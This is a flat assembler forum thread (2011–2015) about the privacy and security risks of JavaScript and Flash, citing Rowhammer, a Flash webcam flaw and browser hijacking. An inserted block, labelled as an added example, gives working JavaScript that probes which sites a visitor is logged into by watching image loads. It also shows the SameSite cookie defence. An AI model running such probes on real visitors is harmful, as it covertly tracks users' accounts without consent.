flat assembler
Message board for the users of flat assembler.
flat assembler > Heap > Why we should always disable JS (and flash)

typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Soon, we are going to have wireless electricity.

That'll give hackers something to do.


Last edited by typedef on 31 Jul 2011, 19:56; edited 1 time in total
Post 31 Jul 2011, 14:55
Tyler



Joined: 19 Nov 2009
Posts: 1216
Location: NC, USA

typedef wrote:
And how to get rid of them :

http://www.macromedia.com/support/documentation/en/flashplayer/help/settings_manager03.html

Uncheck Allow 3rd party Flash content to store data on your PC

If the settings can be changed through Flash itself, doesn't that imply there is a vulnerability somewhere that would allow someone to change that, and any other setting, to whatever they want? Note: the settings manager at that link is a Flash app.
Post 31 Jul 2011, 17:31
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
whatever the fuck they achieve in doing that.

anyways: debt ceiling cat is watching you default. lol
Post 31 Jul 2011, 19:55
YONG



Joined: 16 Mar 2005
Posts: 8000
Location: 22° 15' N | 114° 10' E

MHajduk wrote:
Technologies and tools evolve over time but the purpose ("to entertain people") stays the same since the dawn of history.

Well said. I strongly believe that someone will be quoting this statement in his or her PhD thesis in the near future.
Post 01 Aug 2011, 06:07
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries

vid wrote:
Oh yeah, "visual arts" and "media" are how the big brother bribes us into giving up our privacy.

Yes indeed. Now the game companies want to track you also. Not with JS though, but it is partially related to this thread. Look at this:

Diablo 3 Requires Always-On Internet Connection
Post 01 Aug 2011, 14:46
DOS386



Joined: 08 Dec 2006
Posts: 1904
> Why we should always disable JS (and flash)

Because JS, and even more so Flash, are just redundant and evil. You can get almost everything working well without them, unless, of course, you deliberately want to break compatibility or put your visitors at security and privacy risk.
Post 02 Aug 2011, 13:22
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
My website host appends a script which stores Google Analytics cookies on "your" computer.
Post 02 Aug 2011, 17:15
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Chilling stuff:

Adobe plugs Flash webcam spy hole wrote:
In announcing the fix, Adobe said it was aware of a report describing a clickjacking issue related to the Flash Player Settings Manager. “We have resolved the issue with a change to the Flash Player Settings Manager SWF file hosted on the Adobe website. No user action or Flash Player product update are required." No user action or update required? That comforter is what rattles Steven Bellovin, Professor of Computer Science at Columbia University.

"Code on a remote computer somewhere decides whether or not random web sites can spy on you," he blogged in CircleID. "it's simply wrong for a design to outsource a critical access control decision to a third party. My computer should decide what sites can turn on my camera and microphone, not one of Adobe's servers."

Emphasis is mine.
Post 22 Oct 2011, 16:17
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Well, as if there weren't already enough reasons, here is another:

Detect if visitors are logged into Twitter, Facebook or Google+

And, as usual, all of this fails when JS is disabled.

A random website has no business knowing which other sites I use or log in to.

Remember to always forge your referer also, but everyone already does this, right?
Post 01 Mar 2012, 13:12
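The login-detection trick behind the article linked in the post above, written out as an added example (this is not code from the thread or from the article). The technique relies on a site having a URL that redirects to a real image when the visitor is logged in and to an HTML login page otherwise; an `<img>` fires `onload` in the first case and `onerror` in the second, so a third-party page learns the login state without ever reading a cookie. The probe URLs below are hypothetical placeholders, not endpoints of any real site, and the loader is injected so the logic can be exercised outside a browser.

```javascript
// Added example, not part of the original post.
// HYPOTHETICAL probe URLs: placeholders standing in for a site's
// "redirect to avatar if logged in, else redirect to login page" endpoint.
const LOGIN_PROBES = {
  exampleSocial: 'https://social.example/redirect_to_avatar_if_logged_in',
  exampleMail: 'https://mail.example/redirect_to_logo_if_logged_in',
};

// Browser loader: resolves true when the URL yields a decodable image
// (the logged-in redirect target), false when it yields anything else
// (an HTML login page). The browser attaches the victim's cookies for
// that site to this cross-site <img> request, which is what leaks the state.
function imageLoader(url) {
  return new Promise((resolve) => {
    const img = new Image();
    img.onload = () => resolve(true);
    img.onerror = () => resolve(false);
    img.src = url;
  });
}

// Run every probe and return { siteName: loggedIn }. The loader is a
// parameter so that the same logic runs under Node with a stub loader.
async function detectLogins(probes, load = imageLoader) {
  const entries = await Promise.all(
    Object.entries(probes).map(async ([site, url]) => [site, await load(url)])
  );
  return Object.fromEntries(entries);
}

// Defender's side. The probe only works because the browser sends the
// session cookie on a request initiated by an unrelated page. A cookie
// with SameSite=Lax or SameSite=Strict is withheld from cross-site
// subresource requests such as <img>, so the redirect goes to the login
// page regardless of login state and the probe always reports "logged out".
// Input is a Set-Cookie header value (constructed in the usage below).
function cookieIsProbeResistant(setCookieHeader) {
  const attrs = setCookieHeader.split(';').map((a) => a.trim().toLowerCase());
  return attrs.some((a) => a === 'samesite=lax' || a === 'samesite=strict');
}

// Usage in a browser: detectLogins(LOGIN_PROBES).then(console.log)
// Usage under Node with a stub that "logs in" only to the social site:
detectLogins(LOGIN_PROBES, (url) => Promise.resolve(url.includes('social')))
  .then((result) => {
    console.log(result);
    console.log(cookieIsProbeResistant('sid=abc; Path=/; Secure; HttpOnly; SameSite=Lax'));
    console.log(cookieIsProbeResistant('sid=abc; Path=/; Secure; HttpOnly'));
  });
```

Disabling JS defeats this particular variant, as the post says, but the underlying leak is the cookie being sent cross-site; the same probe can be built from CSS or a plain `<img>` with a timing side channel. The fix that does not depend on the visitor is on the site operator's side: session cookies carrying `SameSite=Lax` or `SameSite=Strict`. Chromium-based browsers have treated cookies without a `SameSite` attribute as `Lax` by default since Chrome 80, which is why this class of probe has become much less reliable than it was in 2012.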
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Let's make a filter library that'll filter out all that stuff. Kind of like Ad-Block but only external to the browser.
Post 02 Mar 2012, 05:45
typedef



Joined: 25 Jul 2010
Posts: 2909
Location: 0x77760000
Is that a quote?
Post 02 Mar 2012, 20:13
edfed



Joined: 20 Feb 2006
Posts: 4157
Location: achtétépéhèseu://pasteubineu.comeu/Vw7WXXf4
done.
Post 02 Mar 2012, 21:02
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
Yet another reason why remote websites should never be permitted to run arbitrary code on a local machine.

http://googleprojectzero.blogspot.co.at/

Quote:
“Rowhammer” is a problem with some recent DRAM devices in which repeatedly accessing a row of memory can cause bit flips in adjacent rows. We tested a selection of laptops and found that a subset of them exhibited the problem. We built two working privilege escalation exploits that use this effect. One exploit uses rowhammer-induced bit flips to gain kernel privileges on x86-64 Linux when run as an unprivileged userland process. When run on a machine vulnerable to the rowhammer problem, the process was able to induce bit flips in page table entries (PTEs). It was able to use this to gain write access to its own page table, and hence gain read-write access to all of physical memory.

[...]

... a serious problem, because it might be possible to generate bit flips from JavaScript code on the open web, perhaps via JavaScript typed arrays.

Post 10 Mar 2015, 01:21
redsock



Joined: 09 Oct 2009
Posts: 265
Location: Australia
WOW, this is heavy duty stuff. Testing all of my gear has resulted in all-clear so far, but the implications of things like this and others are severe and far-reaching. Thanks for the heads-up.
Post 10 Mar 2015, 03:12
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
I was bothered by their seemingly naive notion that this could work on machines with ECC memory. However the rest of the article appears to be much better quality so I am prepared to let that one pass as a silly oversight.
Post 10 Mar 2015, 03:49
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1171
Location: Unknown

Quote:
anyway, I think Flash will be gradually superseded by HTML 5

This was said in 2011. Flash is almost extinct nowadays.

I do not have Flash in my browser anymore, and only a few places complain that I do not have Flash installed; most are just ads.

Now, about disabling JS: it is hard, because many websites don't work at all without JS. That is the reason I have it enabled.

The maximum I can do is to allow a few sites to run JS script on web pages...
Post 11 Mar 2015, 19:22
badc0de02



Joined: 25 Nov 2013
Posts: 211
Location: %x

typedef wrote:
Soon, we are going to have wireless electricity.

That'll give hackers something to do.


What if I get electrocuted because I stumble over a wireless cable that I cannot see? This would not be secure. Or get breast cancer because there is too much technology.
Post 11 Mar 2015, 21:12
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 15312
Location: Bigweld Industries
It is easy to unwittingly become part of a DDoS attack with your JS enabled.

https://www.eff.org/deeplinks/2015/04/china-uses-unencrypted-websites-to-hijack-browsers-in-github-attack

We have no easy way to audit JS code that arrives at our browsers. It can be a huge mess of obfuscated text that could take weeks to decode and analyse. And we can never know who is really generating the code within the webpage.
Post 04 Apr 2015, 15:15
ManOfSteel



Joined: 02 Feb 2005
Posts: 1135
I almost never have JavaScript enabled. That includes when I'm on GitHub.

I only enable it when the website doesn't work at all/doesn't display any of its contents.
Post 04 Apr 2015, 16:09
HaHaAnonymous



Joined: 02 Dec 2012
Posts: 1171
Location: Unknown
But they say disabling JavaScript is not recommended:

    • Allow all sites to run JavaScript (recommended)
    • Do not allow any site to run JavaScript

Now here comes the question: if they recommend it, isn't it because it is safe to have it enabled!?

I'm asking that because those words come from security enthusiasts...
Post 04 Apr 2015, 16:22



Powered by phpBB © 2001-2005 phpBB Group.

Copyright © 2004-2016, Tomasz Grysztar.